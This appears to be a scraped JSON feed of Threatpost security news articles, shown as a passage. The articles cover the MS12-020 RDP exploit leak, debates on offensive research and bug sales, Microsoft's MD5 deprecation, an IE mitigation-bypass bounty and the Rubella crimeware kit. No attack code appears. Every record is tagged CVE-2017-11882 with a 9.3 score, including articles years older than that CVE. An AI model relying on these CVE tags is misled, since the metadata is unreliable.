that the code posted on the Chinese site was written well after ZDI sent the vulnerability information to Microsoft.\n\nAaron Portnoy of ZDI said that he is \u201c100% confident\u201d that the leak did not come from ZDI and that Microsoft has confirmed this, as well.\n\n\u201cIt was most definitely not ZDI that leaked anything,\u201d he said. \u201cWe PGP encrypt all the details and send it to the vendor and it\u2019s out of our hands at that point. We\u2019ve never had any reason to think that there\u2019s any leaks in our organization.\u201d\n\nA fourth potential scenario is that someone at the Microsoft Security Response Center somehow leaked the code. This is a fairly terrifying possibility. Consider the access that MSRC employees have. They see the incoming bug reports from researchers, work with researchers to confirm the vulnerabilities and help develop proof-of-concept exploits. If someone inside that process purposely handed over information about the RDP bug, it would be a disaster. The RDP vulnerability is a valuable one because of the huge number of affected machines and the fact that it can be exploited over the network, pre-authentication. Giving exploit code for that kind of flaw\u2013or any flaw, for that matter\u2013to outside parties would be about as bad as it gets.\n\nWhich leads to the last possibility: the MSRC is compromised. This is the doomsday scenario for Microsoft and its customers. The MSRC is a respository of a tremendous amount of valuable vulnerability data, and if that organization was somehow owned, the repercussions would be mind-boggling. It seems likely that if this was the case, there would have been other indications of the compromise at some point, possibly in the form of other exploits being leaked. And it also stands to reason that if someone had compromised the MSRC, he wouldn\u2019t advertise that fact by posting identifiable exploit code on a public site.\n\n[Luigi Auriemma](<http://aluigi.org/adv/ms12-020_leak.txt>), who discovered the RDP flaw, says that he believes that the leak came from somewhere in the MAPP chain of custody, given that the exploit code in question looks to have been written at the MSRC and that it contains a packet that he is certain is one he wrote explicitly for the purpose of testing the bug.\n\n\u201cThe executable PoC was compiled in November 2011 and contains some debugging strings like MSRC11678 which is a clear reference to the Microsoft Security Response Center. In short it seems written by Microsoft for the internal tests and was\n\nleaked probably during its distribution to their \u2018partners\u2019 (MAPP) for the creation of antivirus signatures and so on,\u201d he wrote in an analysis of the situation on his site. \u201cThe other possible scenario is about a Microsoft employee as direct or indirect source of the leak. The hacker intrusion looks the less probable scenario at the moment. The information retrieved by other people in the moment I\u2019m writing seem to confirm the MAPP hypothesis.\u201d\n\nMicrosoft [published a blog post](<http://blogs.technet.com/b/msrc/archive/2012/03/16/proof-of-concept-code-available-for-ms12-020.aspx>) late Friday afternoon on the code leak, but haven\u2019t made security officials available to answer specific questions.\n\n\u201cThe details of the proof-of-concept code appear to match the vulnerability information shared with Microsoft Active Protections Program (MAPP) partners. Microsoft is actively investigating the disclosure of these details and will take the necessary actions to protect customers and ensure that confidential information we share is protected pursuant to our contracts and program requirements,\u201d Yunsun Wee, director in the Trustworthy Computing Group, write. \n\n_Note: Kaspersky Lab is a member of the MAPP program, but Threatpost editors do not have access to the MAPP information._\n", "cvss3": {}, "published": "2012-03-16T19:12:33", "type": "threatpost", "title": "MS12-020 RDP Code Leak Mystery Deepens As Microsoft Remains Silent", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:36", "id": "THREATPOST:7FF462EBFF86BEB1E7C8207D6CB07E50", "href": "https://threatpost.com/ms12-020-rdp-code-leak-mystery-deepens-microsoft-remains-silent-031612/76339/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:36", "description": "Many industries tend to run in identifiable cycles. Financial services, the auto industry, entertainment\u2013they all have cycles. Because the security industry isn\u2019t nearly as old as any of these, it hasn\u2019t had much of a chance to establish such cycles. But one seems to be appearing now in the form of renewed criticism and distaste for offensive security research.\n\nThe most recent cycle has been building momentum for some time now, but the jumping off point may have come last month in a talk by Adobe security and privacy chief Brad Arkin. The gist of the talk was that defenders need to focus their energy on making exploitation and attacks more expensive for the bad guys. However that happens\u2013whether it\u2019s through the addition of exploit mitigation technologies, deploying sandboxes or any number of other techniques\u2013raising the cost of attacks should be the priority.\n\n\u201cI would say to the researchers here, work on defense. This is where you\u2019re going to make a difference,\u201d Arkin said. \u201cIf you come up with a new offensive technology, the bad guys will use it.\u201d\n\nThat\u2019s in contrast to the mentality that has prevailed among many software companies and security professionals, who often focus on finding and fixing as many security vulnerabilities as possible. The more bugs you fix, the fewer there are for the attackers to exploit, after all.\n\nThat\u2019s true, of course, but it ignores the fact that the number of total bugs is unknowable and constantly changing. And, it also ignores the fact that many attackers don\u2019t ever bother with zero days; there\u2019s no need. There are so many older vulnerabilities that are lying unpatched on millions and millions of machines out there that it\u2019s a waste of time and money for attackers to look for new ones to exploit. \n\u201cFinancially motivated attackers don\u2019t invest in original research. It\u2019s too expensive these days,\u201d Arkin said. \u201cIt\u2019s pen testers or it\u2019s nation states or the people funded by them. That research is done by professional bad guys who have financial horizons that far exceed those of financially motivated bad guys.\u201d\n\nAt last week\u2019s RSA Conference there were more murmurs about the relative value of offensive security research, too. The ongoing debate about the sale of bugs\u2013whether it\u2019s on the black market, the grey area of government sales or to legitimate entities such as the Zero Day Initiative\u2013includes some in the security community who are of the mind that selling vulnerabilities is an inherently shady activity. That discussion came up many times over the course of the week, with a predictable lack of agreement on the subject.\n\nThe problem, opponents of bug sales say, is that regardless of who you sell the bug to, you have no way of knowing against whom that vulnerability might ultimately be used. Some researchers say that\u2019s not their problem; they do the research and make the sale and what happens after that is up to the buyer and out of their hands.\n\nWith the [Pwn2Own contest at CanSecWest](<https://threatpost.com/revamped-pwn2own-offer-105k-prizes-cash-google-chrome-0-days-012312/>) scheduled for later this week, the conversation will likely not just continue, but amp up. Offense is at the fore at CanSecWest, not just during Pwn2Own, but during the conference talks, as well, and rare is the year that a major bug or exploitation technique isn\u2019t revealed there.\n\nThis is not the first time this carousel has spun round this way. Ten or fifteen years ago, as legitimate security research was making its way into the mainstream, many vendors had reactions bordering on anaphylactic shock when a researcher reported a bug to them or went public with it after a lack of response. Large software companies, including Microsoft and Oracle, would in some cases refuse to deal with researchers at all or slow the process down to such a point that it was impossible for the researchers to know whether the bug would ever be fixed.\n\nThat led to the brain-melting disclosure debate, which has never gone away, and it also led to the establishment of formal security response programs and organizations at many companies. Later, it helped spur the bug bounty programs run by companies such as Google, Mozilla and others, to reward security researchers who chose to report their findings to the vendors privately.\n\nSo, as often happens, what was old is now new again. But this time it has the added spice of cyberwar hysteria, with legions of highly trained foreign attackers using zero days stolen from some secret NSA database. Maybe that\u2019s happening. Who knows? But what\u2019s definitely happening is that researchers are selling bugs to a variety of people and organizations, some legitimate and others not. And as long as serious bugs can command six figures, that\u2019s never going to end and neither will offensive security research.\n", "cvss3": {}, "published": "2012-03-06T10:20:31", "type": "threatpost", "title": "An End to Offensive Security Research? Unlikely", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:42", "id": "THREATPOST:0F2DE86E0069A54E56B0694DA999399A", "href": "https://threatpost.com/end-offensive-security-research-unlikely-030612/76285/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:19", "description": "About a decade ago, many large software makers learned some very difficult lessons about software security and building security into their products from the start. Some are still learning. The FTC and a variety of security experts are hoping that today\u2019s crop of start-ups will not have to go through that same painful process.\n\nThe FTC is launching a new initiative aimed at start-ups, called [Start With Security](<https://www.ftc.gov/tips-advice/business-center/guidance/start-security-guide-business>), that\u2019s designed to help smaller companies build security into not just their products, but also into their cultures. One of the thrusts of that effort is encouraging companies to begin thinking about the security of their products from the very beginning of the design and development process. This is something that vendors such as Microsoft, Adobe, and many others have been doing for some time.\n\nBut that\u2019s not always because someone inside the company just thought it was a keen idea. In most cases, the changes the software makers made were in response to repeated public attacks on their products and pressure from customers for change. Microsoft is the perfect example. Following a series of major worms that exploited bugs in their products, the company did an about-face on security.\n\n[Window Snyder](<https://threatpost.com/how-i-got-here-window-snyder/114524/>), who was in the security group at Microsoft at the time, said during a panel at an [event](<https://www.ftc.gov/news-events/events-calendar/2015/09/start-security-san-francisco>) sponsored by the FTC in San Francisco Wednesday that the change was an incredibly difficult one for the company.\n\n\u201cThe real motivator for change at Microsoft was a tremendous amount of pain. You guys don\u2019t have to go that route,\u201d said Snyder, who is now the CSO at Fastly.\n\n\u201cThe cost to Microsoft to make those kinds of changes was tremendous. It was a huge challenge for them to try and turn the ship at that point. That was a huge cost and you don\u2019t want to do it at the end, you want to do it at the beginning. That\u2019s the time to think about security.\u201d\n\nNot only is the process simpler when you start thinking about security early, it\u2019s far less expensive, the panelists said.\n\n\u201cSecurity is much, much, much cheaper the earlier you do it,\u201d said Devdatta Akhawe, a security engineer at Dropbox. \u201cEither you can plan for security early on and be happy later, or keep fighting and have an expensive battle later on.\u201d\n\nThis is a message that software security experts and many others have been trying to convey to developers and design teams for a long time, with varying levels of success. Many large enterprises, not just commercial software vendors, have adopted secure coding and threat modeling practices and become involved in projects such as [BSIMM](<https://www.bsimm.com>), a software security maturity model.\n\nBut getting the security message across to non-security people can be a difficult process. Frank Kim, CISO of The SANS Institute, said making the risks and rewards real for people is an important aspect of the effort.\n\n\u201cYou have to focus on telling stories. You can\u2019t just go and say, There\u2019s a vulnerability in this line of code and you\u2019re a terrible person,\u201d Kim said. \u201cWe make it tangible and concrete by telling stories about what can happen to your application as a result of that vulnerability.\u201d\n\nThe seriousness of the security problem is not lost on officials at the top of the FTC, which is responsible for investigating and punishing companies that fail to live up to security and privacy standards.\n\n\u201cIn a world where everything is connected, insecure products and services can have severe consequences. It\u2019s never been more clear that we must secure the software supporting our digital lives,\u201d FTC Chairwoman Edith Ramirez said in her opening remarks at the event.\n", "cvss3": {}, "published": "2015-09-09T15:03:39", "type": "threatpost", "title": "FTC, Experts Push Startups to Think About Security From the Beginning", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-09-09T19:03:39", "id": "THREATPOST:A3218B82F449C5905D1957A1C264C1C1", "href": "https://threatpost.com/ftc-experts-push-startups-to-think-about-security-from-the-beginning/114612/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:21", "description": "The clock is running on Windows administrators to sweep out MD5 implementations before a February 2014 patch from Microsoft slams the door shut on the broken, aged crypto algorithm.\n\nMicrosoft released a pair of advisories yesterday in addition to its regular [Patch Tuesday security updates](<http://threatpost.com/microsoft-august-patch-tuesday-addresses-critical-ie-exchange-and-windows-flaws/101981>) alerting users to the fact it would in six months [restrict the use of digital certificates with MD5 hashes](<http://technet.microsoft.com/en-us/security/advisory/2862973>) issued under roots in the Microsoft root certificate program. Admins should use the leeway to find any systems or applications relying on MD5 and determine whether the patch will break anything and otherwise impact their environments.\n\nThe second advisory announced the optional availability of network level authentication (NLA) as an authentication method that can be used during [Remote Desktop Protocol sessions](<https://support.microsoft.com/kb/2861855>). [NLA adds a layer of security to RDP sessions](<http://technet.microsoft.com/en-us/library/cc732713.aspx>) by requiring that the user be authenticated to the host server before creation of a session.\n\n\u201cMicrosoft seems to be going after less secure encryption techniques, and that\u2019s a good thing for Microsoft to start eliminating them from the landscape, especially MD5,\u201d said Lamar Bailey, director of security research and development at Tripwire. \u201cI also like the way they are releasing them as optional right now. [The MD5 patch] will be pushed out live in February, so this gives customers a chance to determine if it\u2019s going to break anything.\u201d\n\nWhen the patch is pushed universally in February, [MD5 hashes will no longer be accepted](<http://support.microsoft.com/kb/2862973>) among Microsoft root certificates. The change applies only to certificates used for server authentication, code signing and time stamping, Microsoft said, adding that it would not block other uses of MD5, and that it would allow for signed binaries that were signed before March 2009.\n\nCustomers need to determine, in the meantime, which services are still using MD5 crypto and switch to a stronger algorithm such as the SHA2 family. Weaknesses in MD5 were identified as early as the mid-1990s and research demonstrating collisions was presented in 2004 and 2005. In 2008, practical collision attacks including one where an attacker could spoof a trusted root certificate authority were also demonstrated, leading CERT late in that year to release [vulnerability note](<http://www.kb.cert.org/vuls/id/836068>) that sounded the death knell for MD5.\n\nYet, vulnerability scanners and penetration testers continue to find MD5 inside organizations today and flag them for weak cryptography. The problem is that is that in order for users to change crypto on their servers, they have to manually edit the registry, which can be a chore.\n\n\u201cI\u2019m all for changing it; it should be gone and we see it in customer sites all the time,\u201d Bailey said. \u201cBut we have to make it easier to change it. It\u2019s like if you get a recall notice from a car manufacturer that says \u2018If you have this spark plug, bring your car in for servicing.\u2019 I don\u2019t know what spark plugs my car is running. I have to dive under the cover to figure out if I have what they\u2019re saying is bad.\u201d\n\nExperts say most production servers and webservers hosting production websites are likely not running MD5; it\u2019s second-tier development servers, for example, that were spun up years ago and still store sensitive data that are the outlying issue here\u2014and a tempting target for a hacker. With MD5 broken for so long, enough attacks have been made public and enough advances have been made in processor speeds that cracking MD5 crypto isn\u2019t likely that much of a barrier for an attacker.\n\nRoss Barrett, senior manager of security engineering with Rapid7, said that attackers can use stolen certificates to redirect traffic or inject malware.\n\n\u201cIt\u2019s a bit of a heavy-handed attack to just steal credit cards, but if you have a national security program and you\u2019re sweeping for anyone you can get at, this might justify the cost and effort behind this type of attack,\u201d Barrett said. \u201cAny crypto [attack] relies on the complexity of generating the hash versus the difficulty of creating a collision. This can be facilitated as we get more powerful computers and the technology gets stronger to do so. Plus you have a black market industry building computers suited for doing lots of math, like cracking hashes and generating collisions.\u201d\n\nTripwire\u2019s Bailey, for example, estimates that 30 percent of the customers he deals with are still running MD5 somewhere in their environments.\n\n\u201cWe see it with a lot of homegrown systems and apps where the team that worked on it built it years ago and may not be there anymore. They built a custom app running MD5 crypto and said that was good enough because they were internal. Well it\u2019s not.\u201d\n\nThis isn\u2019t Microsoft\u2019s first move against weak cryptographic schemes. Last October, it released a mechanism organizations could use to find RSA certificate key lengths shorter than 1024. In June, anything shorter was considered untrusted and was revoked. Microsoft, in fact, urged customers to move to 2048-bit or higher keys.\n\n\u201cThe test will be for the end user that this is coming and it\u2019s time to get rid of it in the environment,\u201d Bailey said. \u201cAnd Microsoft is testing too whether any of its customers push back and need more time. If February rolls around and it\u2019s not a mandatory update, that\u2019s probably what happened. I don\u2019t remember Microsoft giving customers such a long runway on this kind of change. They must think [MD5] is out there more than we do to give customers that long of a runway of time.\u201d\n", "cvss3": {}, "published": "2013-08-14T14:25:38", "type": "threatpost", "title": "Microsoft to Eliminate Weak MD5 Crypto Algorithm", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-08-16T18:11:59", "id": "THREATPOST:856DD01A5D951BB0E39AE06B64DDD2A7", "href": "https://threatpost.com/microsoft-starts-countdown-on-eliminating-md5/101994/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:25", "description": "When Microsoft introduced use-after-free mitigations into Internet Explorer last summer, certain classes of exploits were closed off, and researchers and black hats were left to chase new ways to corrupt memory inside the browser.\n\nA team of experts from HP\u2019s Zero Day Initiative were among those who noticed that once-reliable exploits were no longer behaving as expected, and traced it back to a number of mitigations silently introduced in July into IE. By October, researchers Brian Gorenc, AbdulAziz Hariri, and Simon Zuckerbraun had developed attacks against two mitigations, Isolated Heap and MemoryProtection, and today announced they\u2019d been awarded $125,000 from the Microsoft Mitigation Bypass Bounty and Blue Hat Bonus for Defense.\n\nA chunk of that total, $25,000, was awarded separately for a submission suggesting a defense against the technique they submitted. The researchers said they will donate the full bounty to Texas A&amp;M University, Concordia University, and Khan Academy, three institutions that sponsor strong STEM (science, technology, engineering and mathematics) programs.\n\n\u201cWe were very excited when we heard the results from Microsoft,\u201d Gorenc, ZDI lead researcher, said. \u201cWe put a lot of time and effort into that research. We\u2019re glad to hear Microsoft got good data out of it.\u201d\n\nGorenc said Microsoft has not patched the issues identified in the HP ZDI research, and as a result, Gorenc said ZDI will not disclose details yet. He did tell Threatpost that part of the attack includes using MemoryProtect as an oracle to bypass Address Space Layout Randomization (ASLR).\n\n\u201cWe use one mitigation to defeat another,\u201d he said. \u201cStuff like this has been done in the past, but what\u2019s interesting about this one is that these mitigations were designed to make use-after-free harder on the attacker, but what we\u2019ve done is made it defeat another mitigation that IE relies on; it weakens it in that perspective. It was interesting to see one used against another.\u201d\n\nUse-after-free vulnerabilities have overtaken buffer overflows as the hot new memory-corruption vulnerability. They happen when memory allocated to a pointer has been freed, allowing attackers to use that pointer against another area in memory where malicious code has been inserted and will be executed. Microsoft, for its part, has invested money and time into building mitigations against memory-related attacks, not only with the inclusion of mitigations in Internet Explorer, but also through its Enhanced Mitigation Experience Toolkit (EMET). For the most part[, bypasses of and attacks against mitigations have largely been confined to researchers and academics](<http://threatpost.com/bypass-demonstrated-for-microsoft-use-after-free-mitigation-in-ie/110570>), but some high-profile targeted attacks that have been outed do take into consideration the presence of these mitigations. Operation Snowman, for example, an APT operation against military and government targets, [scanned for the presence of EMET and would not execute](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>) if the tool was detected.\n\nInternet Explorer has been plagued by [memory corruption bugs](<http://threatpost.com/emet-av-disclosure-leak-plugged-in-ie/108175>) forever it seems, with Microsoft releasing almost [monthly cumulative updates for the browser](<http://threatpost.com/microsoft-keeps-focus-on-ie-security-with-patch-tuesday-updates/107729>) which is constantly being used in targeted attacks and has been easy pickings for hackers.\n\n> ZDI said it will donate the full Microsoft bug bounty to three institutions that sponsor strong STEM programs.\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fie-memory-attacks-net-zdi-125000-microsoft-bounty%2F110876%2F&text=ZDI+said+it+will+donate+the+full+Microsoft+bug+bounty+to+three+institutions+that+sponsor+strong+STEM+programs.>)\n\n\u201cThe attack surface is valuable and has to exist,\u201d Gorenc said of IE and use-after-free bugs. \u201cIt\u2019s an attack surface where with slight manipulations, you can gain code execution on the browser.\u201d\n\nZDI, Gorenc said, has spent the majority of its money on the use-after-free attack surface; ZDI is a vulnerability program that rewards researchers who disclose vulnerabilities through its process. The bugs are shared with HP customers first and then with the affected vendors. ZDI said it has spent $12 million dollars over the past nine years buying vulnerabilities.\n\nGorenc\u2019s colleagues Zuckerbraun and Hariri were external contributors before joining ZDI full time; both spent a lot of time on IE and use-after-free submissions, HP said. For these attacks, Zuckerbraun [reverse engineered MemProtect](<http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Efficacy-of-MemoryProtection-against-use-after-free/ba-p/6556134#.VNNkLC60CL0>), studying how it stymied use-after-free vulnerabilities. Hariri focused on [bypassing Isolated Heap](<http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/HP-Security-Briefing-episode-18-New-directions-in-use-after-free/ba-p/6659998#.VNNkNS60CL0>). Together with Gorenc\u2019s work on sandbox bypasses, the researchers soon had enough research to share with Microsoft.\n\nThe reward, meanwhile, will be donated to the three education institutions, each of which have personal meaning to the respective researchers and their focus on STEM.\n\n\u201cHP Security Research donates to organizations that have a strong STEM emphasis. We decided we would select organizations and charities to receive the money we won that support that emphasis,\u201d Gorenc said. \u201cWe look at it as a way to give back. Hopefully our research has made our environment better, hardened IE, and helps fund a strong engineering organization.\u201d\n", "cvss3": {}, "published": "2015-02-05T10:19:00", "type": "threatpost", "title": "IE Memory Attacks Net ZDI $125,000 Microsoft Bounty", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-12T17:07:39", "id": "THREATPOST:537857B2E29A08953D50AC9EDE93162F", "href": "https://threatpost.com/ie-memory-attacks-net-zdi-125000-microsoft-bounty/110876/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-04-25T05:50:07", "description": "A crimeware kit dubbed the Rubella Macro Builder is betting on a \u201cdirty deeds done dirt cheap\u201d approach to gain popularity in the criminal underground. The kit does two things: with a point-and-click builder functionality, it generates an initial malware payload for social-engineering spam campaigns; and it only costs $40 per month.\n\nRubella is not particularly high-achieving: It eschews the [exploitation of vulnerabilities](<https://threatpost.com/where-have-all-the-exploit-kits-gone/124241/>) for social-engineering techniques; users use it to take the well-worn route of sending out mail with Microsoft Word or Excel email attachments (with the goal of getting victims to enable malicious macros). It\u2019s not very aspirational either: Its humble intent involves generating fairly simple first-stage loader malware that threat actors can use for subsequent downloads and installations on targeted machines.\n\nHowever, the price is right, and it\u2019s got some attractive bells and whistles. A three-month license includes various encryption algorithm choices (XOR and Base64), download methods (PowerShell, Bitsadmin, Microsoft.XMLHTTP, MSXML2.XMLHTTP or a custom PowerShell payload), payload execution methods (executable, JavaScript, Visual Basic Script), and the ability to easily deploy social-engineering decoy themes.\n\n\u201cDespite being relatively new and unsophisticated, the kit has a clear appeal for cybercriminals: it\u2019s cheap, fast and can defeat basic static antivirus detection,\u201d said Flashpoint researchers, [in a blog](<https://www.flashpoint-intel.com/blog/rubella-macro-builder/>).\n\nCheap and easy: That phrase is music to criminals\u2019 ears everywhere, and no less so in the cyberworld. And indeed it\u2019s gaining traction: Flashpoint analysts determined that the criminal gangs behind the Panda and Gootkit banking malware each leveraged the Rubella first-stage loader as an initial attack vector in two recent but separate campaigns.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/04/26145144/Rubella.png>)\n\n\u201cIt is likely that the gangs are customers of the actor offering Rubella on the underground,\u201d the researchers said. \u201cSpecifically, the gangs behind the Panda malware distribution appear to have targeted customers through various social-media platforms, as well as an Australian financial institution through Panda\u2019s web-inject functionality.\u201d\n\nThe macro junk and substitution method appears to be relatively primitive, relying on basic string substitutions. Additionally, its copy/paste implementation of the Base64 algorithm is displayed in Visual Basic Script (VBS) code implementation. The code is obfuscated through general Chr ASCII values. But it lives squarely in the sweet spot for most financially motivated criminals, whose model relies on maximizing margins and volume. And the infection tactics, though arguably pedestrian, work.\n\n\u201cMicrosoft Office macro-based malware appears to still be threat actors\u2019 preferred method for obtaining initial access to compromised machines,\u201d Flashpoint researchers said. \u201cSuch Microsoft Office-based loader malware works well as an initial decoy\u2014disguising itself as a commonly exchanged Word or Excel document and impersonating normal Microsoft Office or Excel attachments\u2014and is generally spread via email attacks. While relatively unsophisticated, the Rubella Macro Builder represents a moderate threat to various networks.\u201d\n", "cvss3": {}, "published": "2018-04-26T19:33:48", "type": "threatpost", "title": "Rubella Crimeware Kit: Cheap, Easy and Gaining Traction", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-04-26T19:33:48", "id": "THREATPOST:45A8572FB3BCE9303EDEE2A4783994E3", "href": "https://threatpost.com/rubella-crimeware-kit-cheap-easy-and-gaining-traction/131474/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:28", "description": "**Emergency IE Patch** \u2013 Fri, January 9, 2009\n\nRyan and Roel dissect the latest wave of malware attacks against Microsoft Internet Explorer browser and discuss the company\u2019s plans to ship an emergency out-of-band update.\n\n[(Download episode)](<https://media.threatpost.com/wp-content/uploads/sites/103/2009/03/12025213/RyanRoel_episode7.mp3>)\n", "cvss3": {}, "published": "2009-03-18T16:35:05", "type": "threatpost", "title": "The Ryan & Roel Show Episode 7", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:10", "id": "THREATPOST:5BA927C1BD88B4949BDAEC1ACC841488", "href": "https://threatpost.com/ryan-roel-show-episode-7-031809/72718/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:05:06", "description": "[](<https://threatpost.com/microsoft-pay-200000-innovative-defense-technology-blue-hat-prize-program-080311/>)LAS VEGAS\u2013In the face of mounting external pressure to begin paying bug bounties, Microsoft is instead launching a new program that will pay a $200,000 top prize to a security researcher who develops the most innovative defensive security technology. The program is designed to \u201cinspire researchers to focus their talents on defensive technologies,\u201d the company said.\n\nKnown as the Blue Hat Prize, after the company\u2019s regular internal research conferences, the program will focus in its first year on getting researchers to design a novel runtime technology to defend against memory safety vulnerabilities. Microsoft security officials said that rather than paying for individual bugs the way that some other companies such as Google, Mozilla and others do, they wanted to encourage researchers to think about ways to defeat entire classes of bugs.\n\n\u201cWhen we looked at the various economic incentive models, the bug bounty was among them. But when we looked at what researchers were doing with the bugs they found in our products across the board, we found that there were a lot more motivations for researchers than just money,\u201d said Katie Moussouris, senior security strategist in Microsoft\u2019s Trustworthy Computing Group. \u201cThere\u2019s recognition and there\u2019s what I call the pursuit of intellectual happiness, just the act of finding these issues.\u201d\n\nUnder the rules of the Blue Hat Prize program, any researcher 14 or older is eligible, and the researchers who win prizes will not only get the cash prize, but also will retain full intellectual property rights to the technology. The winners have to agree to license the technology to Microsoft, however.\n\nThe top prize is $200,000, with second prize paying $50,000 and third prize is a one-year MSDN subscription, which is worth $10,000. Microsoft also will fly the three winners to Black Hat next year.\n\nResearchers have been calling for [Microsoft to start a bug bounty program](<https://threatpost.com/does-microsoft-need-bug-bounties-050511/>) for several years now, and company officials has repeatedly said that Microsoft is not interested in paying for individual vulnerabilities. This new program gets around the semantics of all that by encouraging researchers to find a new way to mitigate attacks against an entire class of bugs. \n\n\u201cTwo examples of open \nproblems that are suitable for consideration in this challenge are address space \ninformation disclosures and return-oriented programming (ROP). Note that you are \nnot required to address these and you are not limited to these examples,\u201d Microsoft said in the rules for the program, which are on the [Blue Hat Prize site](<http://www.microsoft.com/security/bluehatprize/>). \n\nEntries are going to be judged by a panel of security experts from Microsoft teams, including the Microsoft Security Response Center, the Windows team and others. \n\nMoussouris said that Microsoft was looking for a way to inspire researchers to focus their talents on defensive technologies and not just finding bugs.\n\n\u201cThis seemed the best way for us to engage with the research community and protect customers simultaneously,\u201d she said.\n", "cvss3": {}, "published": "2011-08-03T17:34:12", "type": "threatpost", "title": "Microsoft to Pay $200,000 for Innovative Defense Technology in Blue Hat Prize Program", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:34:03", "id": "THREATPOST:C8BB08507CBCCE4C217C33C15D3AA04D", "href": "https://threatpost.com/microsoft-pay-200000-innovative-defense-technology-blue-hat-prize-program-080311/75507/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:04", "description": "[From Computerworld (Gregg Keizer)](<http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9133240>)[](<https://threatpost.com/new-windows-netbooks-may-harbor-malware-051909/>)\n\nAfter discovering attack code on a brand new Windows XP netbook, anti-virus vendor Kaspersky Labs warned users yesterday that they should scan virgin systems for malware before connecting them to the Internet.\n\nWhen Kaspersky developers installed their recently-released Security for Ultra Portables on an M&amp;A Companion Touch netbook purchased for testing, \u201cthey thought something strange was going on,\u201d [said Roel Schouwenberg](<http://www.viruslist.com/en/weblog?weblogid=208187720>) [viruslist.com], a senior anti-virus researcher with the Moscow-based firm. Schouwenberg scanned the machine \u2014 a $499 netbook designed for the school market \u2014 and found three pieces of malware. [Read the full story](<http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9133240>) [computerworld.com]\n", "cvss3": {}, "published": "2009-05-19T15:38:56", "type": "threatpost", "title": "New Windows netbooks may harbor malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:14", "id": "THREATPOST:E65917E5AE555B95E6FFBD69E00E682D", "href": "https://threatpost.com/new-windows-netbooks-may-harbor-malware-051909/72668/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:14", "description": "\n\nScott Charney used his keynote speech at the RSA Conference on Tuesday to talk up a variety of hardware and software-based technologies meant to infuse the Internet with more trust. Charney, the head of Microsoft\u2019s Trustworthy Computing team, talked about the need for greater adoption of TPMs, code signing and identity systems, all of which the company has been discussing in various forms for the better part of a decade.\n\nMany of the technologies that Charney discussed, including the TPM and code signing, were part of the company\u2019s much-maligned and controversial Palladium project. Some of the technologies have been implemented in various forms in Vista and others are still forthcoming. But Charney said Tuesday that many of the problems that plague the Internet could be addressed with better trust on the part of users, machines, vendors and other parties.\n\n\u201cWe need alignment between political, economic and social forces and IT,\u201d he said. \u201cWe need trusted people, we need to know who we\u2019re dealing with online.\u201d\n\nMany of the machines that now run Vista include a TPM, which is a hardware module used to attest to the identity of the machine, as well as serve as a sealed storage area for cryptographic keys. \u201cWe have to root trust in the hardware because it\u2019s less malleable than software,\u201d Charney said.\n\nMicrosoft also is working on some new technologies, including the [Geneva server](<http://msdn.microsoft.com/en-us/security/aa570351.aspx>) which handles identity in a claims-based manner, Charney said. \u201cThis identity metasystem is the most controversial part because of privacy concerns,\u201d he said.\n", "cvss3": {}, "published": "2009-04-21T18:54:59", "type": "threatpost", "title": "Charney plugs Microsoft end-to-end trust at RSA Conference", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:23", "id": "THREATPOST:6C50260122AE142A1AA28DCFDE4EA98B", "href": "https://threatpost.com/charney-plugs-microsoft-end-end-trust-rsa-conference-042109/72565/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:16", "description": "[ 